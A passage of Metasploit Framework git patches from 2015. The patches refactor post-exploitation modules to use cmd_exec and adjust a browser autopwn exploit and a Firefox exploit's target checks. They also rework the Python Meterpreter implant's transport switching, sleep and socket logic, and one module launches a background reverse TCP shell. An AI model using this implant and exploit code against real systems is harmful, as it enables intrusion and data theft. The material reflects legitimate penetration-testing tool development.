     output
   end
 
-  def cat_file(filename)
-    vprint_status("Download: #{filename}")
-    output = read_file(filename)
-    output
-  end
-
   def get_packages(distro)
     packages_installed = ""
     case distro
diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb
index 161d091090..6feeb24323 100644
--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -66,17 +66,6 @@ class Metasploit3 < Msf::Post
     print_status("#{msg} stored in #{loot.to_s}")
   end
 
-  def get_host
-    case session.type
-    when /meterpreter/
-      host = sysinfo['Computer']
-    when /shell/
-      host = session.shell_command_token('hostname').chomp
-    end
-    print_status("Running module against #{host}")
-    host
-  end
-
   def execute(cmd)
     vprint_status("Execute: #{cmd}")
     output = cmd_exec(cmd)

From e5836fbdac17bfb623ba1e3ed70c9c71311a5077 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Mon, 29 Jun 2015 10:57:50 -0500
Subject: [PATCH 0600/1013] Removed session -d from core.rb Ticket #4423

---
 lib/msf/ui/console/command_dispatcher/core.rb | 28 ++-----------------
 1 file changed, 2 insertions(+), 26 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index f395805f99..423df8419a 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -40,7 +40,6 @@ class Core
     "-l" => [ false, "List all active sessions"                       ],
     "-v" => [ false, "List verbose fields"                            ],
     "-q" => [ false, "Quiet mode"                                     ],
-    "-d" => [ true,  "Detach an interactive session"                  ],
     "-k" => [ true,  "Terminate sessions by session ID and/or range"  ],
     "-K" => [ false, "Terminate all sessions"                         ],
     "-s" => [ true,  "Run a script on the session given with -i, or all"],
@@ -1679,9 +1678,6 @@ class Core
         sid = val || false
       when "-K"
         method = 'killall'
-      when "-d"
-        method = 'detach'
-        sid = val || false
       # Run a script on all meterpreter sessions
       when "-s"
         unless script
@@ -1827,26 +1823,6 @@ class Core
           end
         end
       end
-    when 'detach'
-      print_status("Detaching the following session(s): #{session_list.join(', ')}")
-      session_list.each do |sess_id|
-        session = verify_session(sess_id)
-        # if session is interactive, it's detachable
-        if session
-          if session.respond_to?(:response_timeout)
-            last_known_timeout = session.response_timeout
-            session.response_timeout = response_timeout
-          end
-          print_status("Detaching session #{sess_id}")
-          begin
-            session.detach
-          ensure
-            if session.respond_to?(:response_timeout) && last_known_timeout
-              session.response_timeout = last_known_timeout
-            end
-          end
-        end
-      end
     when 'interact'
       session = verify_session(sid)
       if session
@@ -1981,7 +1957,7 @@ class Core
     end
 
     case words[-1]
-    when "-i", "-k", "-d", "-u"
+    when "-i", "-k", "-u"
       return framework.sessions.keys.map { |k| k.to_s }
 
     when "-c"
@@ -3274,7 +3250,7 @@ class Core
         browser_pid = ::Process.spawn(cmd, "https://localhost:3790")
         ::Process.detach(browser_pid)
       elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time.
-        print_line
+        print_linee
         print_warning "For some reason, Community / Pro didn't start in a timely fashion."
         print_warning "You might want to restart the Metasploit services by typing"
         print_warning "'service metasploit restart'. Sorry it didn't work out."

From dde853b0a0521aaaafb5f6f9b66d29d1e82afeef Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Mon, 29 Jun 2015 11:27:50 -0500
Subject: [PATCH 0601/1013] Fixed "linee" to "line"

---
 lib/msf/ui/console/command_dispatcher/core.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 423df8419a..6ce3e89de2 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -3250,7 +3250,7 @@ class Core
         browser_pid = ::Process.spawn(cmd, "https://localhost:3790")
         ::Process.detach(browser_pid)
       elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time.
-        print_linee
+        print_line
         print_warning "For some reason, Community / Pro didn't start in a timely fashion."
         print_warning "You might want to restart the Metasploit services by typing"
         print_warning "'service metasploit restart'. Sorry it didn't work out."

From 834c0e594af489d5b3e3f48aebd98c90fecfd681 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 29 Jun 2015 11:36:28 -0500
Subject: [PATCH 0602/1013] Update multi modules

---
 lib/msf/core/post/common.rb                       | 6 +++++-
 modules/post/multi/gather/multi_command.rb        | 9 ++-------
 modules/post/multi/manage/shell_to_meterpreter.rb | 4 ++--
 modules/post/multi/manage/system_session.rb       | 2 +-
 4 files changed, 10 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index f6bb9f8de1..7f4db478d9 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -122,7 +122,11 @@ module Msf::Post::Common
 
       process.close
     when /shell/
-      o = session.shell_command_token("#{cmd} #{args}", time_out)
+      if args.nil? || args.empty?
+        o = session.shell_command_token("#{cmd}", time_out)
+      else
+        o = session.shell_command_token("#{cmd} #{args}", time_out)
+      end
       o.chomp! if o
     end
     return "" if o.nil?
diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb
index 08e9822b86..c16ef69a6c 100644
--- a/modules/post/multi/gather/multi_command.rb
+++ b/modules/post/multi/gather/multi_command.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
         'License'       => MSF_LICENSE,
         'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform'      => %w{ bsd linux osx unix win },
-        'SessionTypes'  => [ 'meterpreter','shell' ]
+        'SessionTypes'  => ['meterpreter']
       ))
     register_options(
       [
@@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post
 
   # Run Method for when run command is issued
   def run
-    session_type = session.type
     print_status("Running module against #{sysinfo['Computer']}")
     if not ::File.exists?(datastore['RESOURCE'])
       raise "Resource File does not exists!"
@@ -41,11 +40,7 @@ class Metasploit3 < Msf::Post
           tmpout << "      Output of #{cmd}\n"
           tmpout << "*****************************************\n"
           print_status "Running command #{cmd.chomp}"
-          if session_type =~ /meterpreter/
-            tmpout << cmd_exec(cmd.chomp)
-          elsif session_type =~ /shell/
-            tmpout << session.shell_command_token(cmd.chomp).chomp
-          end
+          tmpout << cmd_exec(cmd.chomp)
           vprint_status tmpout
           command_log = store_loot("host.command", "text/plain", session,tmpout ,
             "#{cmd.gsub(/\.|\/|\s/,"_")}.txt", "Command Output \'#{cmd.chomp}\'")
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index 4874b403a3..d871740401 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -196,12 +196,12 @@ class Metasploit3 < Msf::Post
       sent = 0
       aborted = false
       cmds.each { |cmd|
-        ret = session.shell_command_token(cmd)
+        ret = cmd_exec(cmd)
         if !ret
           aborted = true
         else
           ret.strip!
-          aborted = true if !ret.empty?
+          aborted = true if !ret.empty? && ret !~ /The process tried to write to a nonexistent pipe./
         end
         if aborted
           print_error('Error: Unable to execute the following command: ' + cmd.inspect)
diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb
index 299cd0a965..7042d04d9f 100644
--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Post
 
     if not cmd.empty?
       print_status("Executing reverse tcp shel to #{lhost} on port #{lport}")
-      session.shell_command_token("(#{cmd} &)")
+      cmd_exec("(#{cmd} &)")
     end
   end
 

From 656e6f5c7353cc624b8fbf8f02601f2a639e5165 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 29 Jun 2015 11:56:38 -0500
Subject: [PATCH 0603/1013] Fix windows enum modules

---
 modules/post/windows/gather/enum_computers.rb     | 3 +--
 modules/post/windows/gather/enum_domain_tokens.rb | 4 ++--
 2 files changed, 3 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb
index b7a921fd93..8ecc9ee524 100644
--- a/modules/post/windows/gather/enum_computers.rb
+++ b/modules/post/windows/gather/enum_computers.rb
@@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post
   def run
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
     domain = get_domain()
-
     if not domain.empty?
       hostname_list = get_domain_computers()
       list_computers(domain, hostname_list)
@@ -49,7 +48,7 @@ class Metasploit3 < Msf::Post
   def get_domain_computers()
     computer_list = []
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net view").split(devisor)[1]
+    raw_list = cmd_exec('net view').split(devisor)[1]
     if raw_list =~ /The command completed successfully/
       raw_list.sub!(/The command completed successfully\./,'')
       raw_list.gsub!(/\\\\/,'')
diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb
index 9480d1fb3d..c917d0be8d 100644
--- a/modules/post/windows/gather/enum_domain_tokens.rb
+++ b/modules/post/windows/gather/enum_domain_tokens.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Post
   # List local group members
   def list_group_mem(group)
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net localgroup #{group}").split(devisor)[1]
+    raw_list = cmd_exec("net localgroup #{group}").split(devisor)[1]
     account_list = raw_list.split("\r\n")
     account_list.delete("The command completed successfully.")
     return account_list
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
   def list_domain_group_mem(group)
     account_list = []
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net groups \"#{group}\" /domain").split(devisor)[1]
+    raw_list = cmd_exec("net groups \"#{group}\" /domain").split(devisor)[1]
     raw_list.split(" ").each do |m|
       account_list << m
     end

From 02cd2a9cd9091c492dfee191073c903dc5a165e5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 29 Jun 2015 12:07:37 -0500
Subject: [PATCH 0604/1013] Fix #3951 Update Windows::Registry to use cmd_exec

---
 lib/msf/core/post/windows/registry.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb
index 26ee1d7701..720e49dbef 100644
--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -170,7 +170,7 @@ protected
     elsif view == REGISTRY_VIEW_64_BIT
       cmd += " /reg:64"
     end
-    session.shell_command_token_win32("#{cmd} #{suffix}")
+    cmd_exec("#{cmd} #{suffix}")
   end
 
   def shell_registry_cmd_result(suffix, view = REGISTRY_VIEW_NATIVE)

From 7aeb9e555b247eace2cfd124a167fc9e09be009f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 29 Jun 2015 12:13:46 -0500
Subject: [PATCH 0605/1013] Change ranking and support CAMPAIGN_ID

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 1 +
 modules/exploits/multi/browser/autopwn.rb | 4 ++--
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index d2b3ccbf92..48d321bd27 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -348,6 +348,7 @@ module Msf
         multi_handler.datastore['PrependMigrateProc']   = datastore['PrependMigrateProc'] if datastore['PrependMigrateProc']
         multi_handler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript'] if datastore['InitialAutoRunScript']
         multi_handler.datastore['AutoRunScript']        = datastore['AutoRunScript'] if datastore['AutoRunScript']
+        multi_handler.datastore['CAMPAIGN_ID']          = datastore['CAMPAIGN_ID'] if datastore['CAMPAIGN_ID']
 
         # Configurable only by BAP
         multi_handler.datastore['EXITONSESSION'] = false
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index afecbfc00c..49113c3ecd 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserAutopwnv2
 
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        => [ [ 'Automatic', {} ] ],
       'Platform'       => %w{ java linux osx solaris win android firefox },
       'Privileged'     => false,
-      'DisclosureDate' => "Feb 5 2014",
+      'DisclosureDate' => "Jul 5 2015",
       'Targets'        => [ [ 'Automatic', {} ] ],
       'References'     =>
         [

From 9a8ffacfd1fd3566ee46df0ef63fa8b6f166c7a9 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 29 Jun 2015 14:00:07 -0400
Subject: [PATCH 0606/1013] Pymet transport changing improvements

---
 data/meterpreter/meterpreter.py | 52 ++++++++++++++++++++++-----------
 1 file changed, 35 insertions(+), 17 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index d62344edbc..c9acd73e6c 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -546,7 +546,7 @@ class TcpTransport(Transport):
 
 	def _get_packet(self):
 		packet = None
-		if len(select.select([self.socket], [], [], 0.5)[0]):
+		if select.select([self.socket], [], [], self.communication_timeout)[0]:
 			packet = self.socket.recv(8)
 			if len(packet) != 8:
 				return None
@@ -573,7 +573,7 @@ class TcpTransport(Transport):
 			url = 'tcp6://'
 		address, port = sock.getsockname()[:2]
 		# this will need to be changed if the bind stager ever supports binding to a specific address
-		if not (address == '0.0.0.0' or address == '::'):
+		if not address in ('', '0.0.0.0', '::'):
 			address, port = sock.getpeername()[:2]
 		url += address + ':' + str(port)
 		url = url
@@ -638,17 +638,28 @@ class PythonMeterpreter(object):
 	def session_has_expired(self):
 		return time.time() > self.session_expiry_end
 
-	def change_transport(self, forward=True):
-		current_idx = self.transports.index(self.transport)
-		if forward:
-			new_idx = min(current_idx + 1, len(self.transports) - 1)
-		else:
-			new_idx = max(current_idx - 1, 0)
-		if new_idx == current_idx:
+	def transport_change(self, new_transport):
+		if new_transport == self.transport:
 			return
 		self.transport.deactivate()
-		self.transport = self.transports[new_idx]
-		self.transport.activate()
+		new_transport.activate()
+		self.transport = new_transport
+
+	def transport_next(self, current_transport=None):
+		if current_transport is None:
+			current_transport = self.transport
+		new_idx = self.transports.index(current_transport) + 1
+		if new_idx == len(self.transports):
+			new_idx = 0
+		return self.transports[new_idx]
+
+	def transport_prev(self, current_transport=None):
+		if current_transport is None:
+			current_transport = self.transport
+		new_idx = self.transports.index(current_transport) - 1
+		if new_idx == 0:
+			new_idx = len(self.transports) - 1
+		return self.transports[new_idx]
 
 	def run(self):
 		while self.running and not self.session_has_expired:
@@ -676,7 +687,7 @@ class PythonMeterpreter(object):
 						elif channel.poll() != None:
 							self.handle_dead_resource_channel(channel_id)
 					elif isinstance(channel, MeterpreterSocketClient):
-						while len(select.select([channel.fileno()], [], [], 0)[0]):
+						while select.select([channel.fileno()], [], [], 0)[0]:
 							try:
 								d = channel.recv(1)
 							except socket.error:
@@ -686,7 +697,7 @@ class PythonMeterpreter(object):
 								break
 							data += d
 					elif isinstance(channel, MeterpreterSocketServer):
-						if len(select.select([channel.fileno()], [], [], 0)[0]):
+						if select.select([channel.fileno()], [], [], 0)[0]:
 							(client_sock, client_addr) = channel.accept()
 							server_addr = channel.getsockname()
 							client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
@@ -788,22 +799,29 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_change(self, request, response):
-		raise NotImplemented()
+		new_transport = Transport.from_request(request)
+		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
+		self.transport_change(new_transport)
+		return None
 
 	def _core_transport_list(self, request, response):
 		response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
-		for transport in self.transports:
+		response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
+
+		transport = self.transport_next()
+		while transport != self.transport:
 			response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
+			transport = self.transport_next(transport)
 		return ERROR_SUCCESS, response
 
 	def _core_transport_next(self, request, response):
 		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
-		self.change_transport(forward=True)
+		self.transport_change(self.transport_next())
 		return None
 
 	def _core_transport_prev(self, request, response):
 		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
-		self.change_transport(forward=False)
+		self.transport_change(self.transport_prev())
 		return None
 
 	def _core_transport_set_timeouts(self, request, response):

From 3d49781230a66f712235dfeb9cb659d334106d77 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 29 Jun 2015 18:34:35 -0400
Subject: [PATCH 0607/1013] Pymet support for core_transport_sleep

---
 data/meterpreter/meterpreter.py | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index c9acd73e6c..a60b6150ae 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -844,7 +844,13 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_sleep(self, request, response):
-		raise NotImplemented()
+		seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
+		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
+		if seconds:
+			self.transport.deactivate()
+			time.sleep(seconds)
+			self.transport.activate()
+		return None
 
 	def _core_channel_open(self, request, response):
 		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)

From 3632cc44c59d757ed9eec12fb1e6a0c31833b45f Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 29 Jun 2015 16:40:58 -0500
Subject: [PATCH 0608/1013] Fix nil error when target not found

---
 .../exploits/windows/browser/mozilla_reduceright.rb    | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb
index 7a3e099a27..7f378c62e7 100644
--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -88,17 +88,21 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     agent = request.headers['User-Agent']
     if agent !~ /Firefox\/3\.6\.(16|17)/
-      print_error("This browser is not supported: #{agent.to_s}")
+      print_error("This browser is not supported: #{agent}")
       send_not_found(cli)
       return
     end
 
     my_target = target
     if my_target.name == 'Automatic'
-      if agent =~ /NT 5\.1/ and agent =~ /Firefox\/3\.6\.16/
+      if agent =~ /NT 5\.1/ && agent =~ /Firefox\/3\.6\.16/
         my_target = targets[1]
-      elsif agent =~ /NT 6\.1/ and agent =~ /Firefox\/3\.6\.16/
+      elsif agent =~ /NT 6\.[01]/ && agent =~ /Firefox\/3\.6\.16/
         my_target = targets[2]
+      else
+        print_error("This browser is not a viable target: #{agent}")
+        send_not_found(cli)
+        return
       end
     end
 

From 6a45e196361d3ac2dfed68cf155e3f445bf4cd31 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 30 Jun 2015 15:25:23 -0400
Subject: [PATCH 0609/1013] Pymet fix bind and tcp socket cleanup logic

---
 data/meterpreter/meterpreter.py | 42 +++++++++++++++++++++++++--------
 1 file changed, 32 insertions(+), 10 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index a60b6150ae..b9ac4ebafc 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -488,7 +488,7 @@ class HttpTransport(Transport):
 	def _get_packet(self):
 		packet = None
 		request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
-		url_h = urllib.urlopen(request)
+		url_h = urllib.urlopen(request, timeout=self.communication_timeout)
 		packet = url_h.read()
 		if packet:
 			if packet[8:] == STAGE_START_MARKER:
@@ -500,7 +500,7 @@ class HttpTransport(Transport):
 
 	def _send_packet(self, packet):
 		request = urllib.Request(self.url, packet, self._http_request_headers)
-		url_h = urllib.urlopen(request)
+		url_h = urllib.urlopen(request, timeout=self.communication_timeout)
 		response = url_h.read()
 
 	def tlv_pack_transport_group(self):
@@ -516,6 +516,17 @@ class TcpTransport(Transport):
 		super(TcpTransport, self).__init__()
 		self.url = url
 		self.socket = socket
+		self._cleanup_thread = None
+
+	def _sock_cleanup(self, sock):
+		remaining_time = self.communication_timeout
+		while remaining_time > 0:
+			iter_start_time = time.time()
+			if select.select([sock], [], [], remaining_time)[0]:
+				if len(sock.recv(4096)) == 0:
+					break
+			remaining_time -= time.time() - iter_start_time
+		sock.close()
 
 	def activate(self):
 		if self.socket:
@@ -527,12 +538,20 @@ class TcpTransport(Transport):
 			family = socket.AF_INET6
 			address, port = self.url[7:].split(':', 1)
 		port = int(port.rstrip('/'))
-		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-		if address == '0.0.0.0' or address == '::':
-			sock.bind((address, port))
-			sock.listen(1)
-			sock, _ = sock.accept()
+		if address in ('', '0.0.0.0', '::'):
+			try:
+				server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
+				server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
+			except (AttributeError, socket.error):
+				server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+			server_sock.bind(('', port))
+			server_sock.listen(1)
+			if not select.select([server_sock], [], [], self.communication_timeout)[0]:
+				raise RuntimeError('connection timed out')
+			sock, _ = server_sock.accept()
+			server_sock.close()
 		else:
+			sock = socket.socket(family, socket.SOCK_STREAM)
 			sock.connect((address, port))
 		self.socket = sock
 		return
@@ -540,8 +559,8 @@ class TcpTransport(Transport):
 	def deactivate(self):
 		if not self.socket:
 			return
-		self.socket.shutdown(socket.SHUT_RDWR)
-		self.socket.close()
+		cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
+		cleanup.run()
 		self.socket = None
 
 	def _get_packet(self):
@@ -638,9 +657,11 @@ class PythonMeterpreter(object):
 	def session_has_expired(self):
 		return time.time() > self.session_expiry_end
 
-	def transport_change(self, new_transport):
+	def transport_change(self, new_transport=None):
 		if new_transport == self.transport:
 			return
+		if new_transport is None:
+			new_transport = self.transport_next()
 		self.transport.deactivate()
 		new_transport.activate()
 		self.transport = new_transport
@@ -800,6 +821,7 @@ class PythonMeterpreter(object):
 
 	def _core_transport_change(self, request, response):
 		new_transport = Transport.from_request(request)
+		self.transports.append(new_transport)
 		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
 		self.transport_change(new_transport)
 		return None

From 4b5b7c8a2710af00f361ac39896f79fbc78f1cbf Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 30 Jun 2015 15:46:33 -0400
Subject: [PATCH 0610/1013] Pymet support for core_transport_remove

---
 data/meterpreter/meterpreter.py | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index b9ac4ebafc..8088c6af2e 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -846,6 +846,20 @@ class PythonMeterpreter(object):
 		self.transport_change(self.transport_prev())
 		return None
 
+	def _core_transport_remove(self, request, response):
+		url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
+		if self.transport.url == url:
+			return ERROR_FAILURE, response
+		transport_found = False
+		for transport in self.transports:
+			if transport.url == url:
+				transport_found = True
+				break
+		if transport_found:
+			self.transports.remove(transport)
+			return ERROR_SUCCESS, response
+		return ERROR_FAILURE, response
+
 	def _core_transport_set_timeouts(self, request, response):
 		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
 		if timeout_value:

From 52086308b3ef678ec12d2c1d9299a4c7c8714f60 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Wed, 1 Jul 2015 00:22:54 -0500
Subject: [PATCH 0611/1013] bump to metasploit-payloads 1.0.4

---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 1bbada3563..29efb30d4f 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.3)
+      metasploit-payloads (= 1.0.4)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.3)
+    metasploit-payloads (1.0.4)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index d4d0dcae22..244711be98 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -62,7 +62,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.3'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.4'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From 6711091c70a5538cf92a74bd9af9185e8b5668c9 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Wed, 1 Jul 2015 00:31:09 -0500
Subject: [PATCH 0612/1013] update cached payload sizes

---
 modules/payloads/singles/windows/meterpreter_bind_tcp.rb        | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_http.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_https.rb   | 2 +-
 .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_tcp.rb     | 2 +-
 5 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index 714b403634..e46cfa3aec 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 884270
+  CachedSize = 884782
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index 78561d56b4..d527597e9f 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 885314
+  CachedSize = 885826
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 195a176b98..b1c5f3541e 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 885314
+  CachedSize = 885826
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 6e2e54fe32..16d8395e1c 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 884270
+  CachedSize = 884782
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index 92121049a0..1d84ccbd5d 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit3
 
-  CachedSize = 884270
